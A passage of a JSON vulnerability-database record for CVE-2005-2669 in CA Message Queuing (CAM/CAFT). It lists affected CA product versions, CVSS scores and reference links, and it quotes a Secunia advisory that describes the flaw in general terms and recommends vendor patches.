"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter management portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter management portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates unicenter management for websphere mq",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter management for web servers",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.0.1"
},
{
"model": "associates unicenter management for web servers",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.0"
},
{
"model": "associates unicenter management for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.1"
},
{
"model": "associates unicenter management for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter management for lotus notes/domino",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter jasmine",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter enterprise job manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter enterprise job manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter data transport option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates unicenter asset management sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter asset management sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.2"
},
{
"model": "associates unicenter asset management sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.2"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.2"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter application performance monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter application performance monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.9"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.7"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.1"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates cleverpath olap",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.1"
},
{
"model": "associates cleverpath ecm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates cleverpath aion",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.0"
},
{
"model": "associates cam",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.11"
},
{
"model": "associates cam",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.07"
},
{
"model": "associates cam",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.05"
},
{
"model": "associates brightstor san manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor san manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates brightstor san manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates brightstor san manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates brightstor portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates adviseit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates advantage data transport",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates cam build 29 13",
"scope": "ne",
"trust": 0.3,
"vendor": "computer",
"version": "1.11"
},
{
"model": "associates cam build 220 13",
"scope": "ne",
"trust": 0.3,
"vendor": "computer",
"version": "1.07"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "BID",
"id": "14623"
},
{
"db": "NVD",
"id": "CVE-2005-2669"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-223"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_portal:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_san_manager:1.1:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:cleverpath_olap:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:cleverpath_predictive_analysis_server:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_admin:2.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:messaging:1.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:messaging:1.11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_asset_management:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_data_transport_option:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_management:4.0:*:lotus_notes_domino:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_management:4.1:*:microsoft_exchange:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_management:5.0.1:*:web_servers:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_nsm_wireless_network_management_option:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_remote_control:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_software_delivery:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_software_delivery:3.1:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_tng:2.4.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_san_manager:1.1:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_san_manager:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:cleverpath_aion:10.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:cleverpath_ecm:3.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_application_performance_monitor:3.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_asset_management:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_asset_management:3.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_asset_management:3.2:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_management_portal:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_management_portal:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_software_delivery:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_software_delivery:4.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_tng:2.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_tng:2.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_tng:2.2:*:*:ja:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:advantage_data_transport:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_admin:2.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_admin:2.9:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_admin:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_admin:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_enterprise_job_manager:1.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_enterprise_job_manager:1.0:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_jasmine:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_management:3.5:*:websphere_mq:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_service_level_management:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_service_level_management:3.0.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_service_level_management:3.0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_service_level_management:3.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:adviseit:2.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_san_manager:1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:cleverpath_predictive_analysis_server:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_admin:2.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:messaging:1.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_application_performance_monitor:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_asset_management:3.2:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_asset_management:4.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_management:4.0:*:microsoft_exchange:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_management:5.0:*:web_servers:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_performance_management:2.4:sp3:openvms:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_remote_control:6.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_software_delivery:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_software_delivery:3.1:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_tng:2.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2669"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The discoverer of this issue is currently unknown. The vendor disclosed this issue.",
"sources": [
{
"db": "BID",
"id": "14623"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-223"
}
],
"trust": 0.9
},
"cve": "CVE-2005-2669",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-13878",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2005-2669",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#619988",
"trust": 0.8,
"value": "13.13"
},
{
"author": "CNNVD",
"id": "CNNVD-200508-223",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-13878",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "VULHUB",
"id": "VHN-13878"
},
{
"db": "NVD",
"id": "CVE-2005-2669"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-223"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Computer Associates (CA) Message Queuing (CAM / CAFT) 1.05, 1.07 before Build 220_13, and 1.11 before Build 29_13 allows remote attackers to execute arbitrary commands via spoofed CAFT packets. CAM is prone to a vulnerability that could permit the spoofing of a CAFT application utilizing the CAM instance. This may ultimately allow the execution of arbitrary commands. \nCAFT is a file transfer application that utilizes CAM to send and receive the files. The problem presents itself due to a failure in the CAM service to verify the legitimacy of the CAFT application. \n\n----------------------------------------------------------------------\n\nBist Du interessiert an einem neuen Job in IT-Sicherheit?\n\n\nSecunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-\nSicherheit:\nhttp://secunia.com/secunia_vacancies/\n\n----------------------------------------------------------------------\n\nTITLE:\nCA Various Products Message Queuing Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA16513\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/16513/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nSpoofing, DoS, System access\n\nWHERE:\n\u003eFrom local network\n\nSOFTWARE:\nCA Unicenter TNG 2.x\nhttp://secunia.com/product/3206/\nCA Unicenter Software Delivery 4.x\nhttp://secunia.com/product/5597/\nCA Unicenter Software Delivery 3.x\nhttp://secunia.com/product/5596/\nCA Unicenter Service Level Management 3.x\nhttp://secunia.com/product/5595/\nCA Unicenter Remote Control 6.x\nhttp://secunia.com/product/2622/\nCA Unicenter Performance Management for OpenVMS 2.x\nhttp://secunia.com/product/5573/\nCA Unicenter Network and Systems Management (NSM) Wireless Network\nManagement Option 3.x\nhttp://secunia.com/product/5594/\nCA Unicenter Network and Systems Management (NSM) 3.x\nhttp://secunia.com/product/1683/\nCA Unicenter Management for WebSphere MQ 3.x\nhttp://secunia.com/product/5590/\nCA Unicenter Management for Web Servers 5.x\nhttp://secunia.com/product/5593/\nCA Unicenter Management for Microsoft Exchange 4.x\nhttp://secunia.com/product/5591/\nCA Unicenter Management for Lotus Notes/Domino 4.x\nhttp://secunia.com/product/5592/\nCA Unicenter Jasmine 3.x\nhttp://secunia.com/product/5589/\nCA Unicenter Enterprise Job Manager 1.x\nhttp://secunia.com/product/5588/\nCA Unicenter Data Transport Option 2.x\nhttp://secunia.com/product/5587/\nCA Unicenter Asset Management 4.x\nhttp://secunia.com/product/1682/\nCA Unicenter Asset Management 3.x\nhttp://secunia.com/product/5586/\nCA Unicenter Application Performance Monitor 3.x\nhttp://secunia.com/product/5585/\nCA eTrust Admin 8.x\nhttp://secunia.com/product/5584/\nCA eTrust Admin 2.x\nhttp://secunia.com/product/5583/\nCA CleverPath Predictive Analysis Server 3.x\nhttp://secunia.com/product/5581/\nCA CleverPath Predictive Analysis Server 2.x\nhttp://secunia.com/product/5580/\nCA CleverPath OLAP 5.x\nhttp://secunia.com/product/5578/\nCA CleverPath Enterprise Content Manager (ECM) 3.x\nhttp://secunia.com/product/5579/\nCA CleverPath Aion 10.x\nhttp://secunia.com/product/5582/\nCA BrightStor SAN Manager 11.x\nhttp://secunia.com/product/5576/\nCA BrightStor SAN Manager 1.x\nhttp://secunia.com/product/5575/\nCA BrightStor Portal 11.x\nhttp://secunia.com/product/5577/\nCA Advantage Data Transport 3.x\nhttp://secunia.com/product/5574/\n\nDESCRIPTION:\nSome vulnerabilities have been reported in various products within\nthe CA Message Queuing (CAM / CAFT) software, which can be exploited\nby malicious people to cause a DoS (Denial of Service) or compromise\na vulnerable system. \n\n1) An unspecified error in the CAM service can be exploited to cause\na DoS by sending specially crafted packets to the TCP port. \n\n2) Unspecified boundary errors can be exploited to cause buffer\noverflows by sending specially crafted packets to the service. \n\nSOLUTION:\nApply patches (see vendor advisory for details). \n\nPROVIDED AND/OR DISCOVERED BY:\nReported by vendor. \n\nORIGINAL ADVISORY:\nComputer Associates:\nhttp://supportconnectw.ca.com/public/ca_common_docs/camsecurity_notice.asp\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2669"
},
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "BID",
"id": "14623"
},
{
"db": "VULHUB",
"id": "VHN-13878"
},
{
"db": "PACKETSTORM",
"id": "39503"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "14623",
"trust": 2.8
},
{
"db": "SECUNIA",
"id": "16513",
"trust": 2.6
},
{
"db": "NVD",
"id": "CVE-2005-2669",
"trust": 2.0
},
{
"db": "OSVDB",
"id": "18917",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2005-1482",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1014756",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014760",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014761",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014763",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014764",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014765",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014766",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014767",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014768",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014769",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014770",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014771",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014772",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014773",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014774",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014775",
"trust": 0.8
},
{
"db": "OSVDB",
"id": "18916",
"trust": 0.8
},
{
"db": "BID",
"id": "14622",
"trust": 0.8
},
{
"db": "CERT/CC",
"id": "VU#619988",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200508-223",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-13878",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "39503",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "VULHUB",
"id": "VHN-13878"
},
{
"db": "BID",
"id": "14623"
},
{
"db": "PACKETSTORM",
"id": "39503"
},
{
"db": "NVD",
"id": "CVE-2005-2669"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-223"
}
]
},
"id": "VAR-200508-0052",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-13878"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:53:37.580000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Computer Associates Message Queuing Security hole Repair measures",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=146856"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200508-223"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2669"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.9,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_notice.asp"
},
{
"trust": 2.5,
"url": "http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=32919"
},
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/14623"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/18917"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/16513"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2005/1482"
},
{
"trust": 0.9,
"url": "http://secunia.com/advisories/16513/"
},
{
"trust": 0.8,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_faqs.asp"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/14622"
},
{
"trust": 0.8,
"url": "http://osvdb.org/displayvuln.php?osvdb_id=18916"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014775.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014774.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014773.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014772.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014771.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014770.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014769.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014768.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014767.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014766.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014765.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014764.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014763.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014761.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014760.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014756.html"
},
{
"trust": 0.3,
"url": "http://www.ca.com/"
},
{
"trust": 0.3,
"url": "/archive/1/408817"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5586/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5575/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5581/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5574/"
},
{
"trust": 0.1,
